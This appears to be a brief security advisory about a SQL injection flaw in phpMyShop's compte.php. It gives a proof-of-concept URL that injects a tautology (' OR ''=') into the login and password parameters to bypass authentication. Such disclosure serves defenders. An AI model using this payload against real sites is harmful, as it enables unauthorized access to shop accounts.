phpMyShop compte.php SQL Injection Vulnerability

"Frog Man" <leseulfrog@hotmail.com> has provided the following proof of concept:

http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password=
'%20OR%20''='


 

Privacy Statement
Copyright 2010, SecurityFocus